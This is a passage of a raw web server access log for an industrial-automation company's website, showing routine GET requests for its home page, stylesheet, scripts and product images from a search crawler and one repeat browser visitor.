www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 74.7.229.221] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:50 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 74.7.243.44] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:52 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 74.7.242.174] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 74.7.242.172] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.242.172] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:56 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.243.44] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 74.7.243.1] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:58:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 74.7.228.139] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:23:59:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 74.7.228.139] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:37:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:37:17 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:37:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:37:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:57 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:38:58 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:12 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:45 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:39:46 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 6060] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:40:02 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10536] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[19/Feb/2026:00:42:47 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 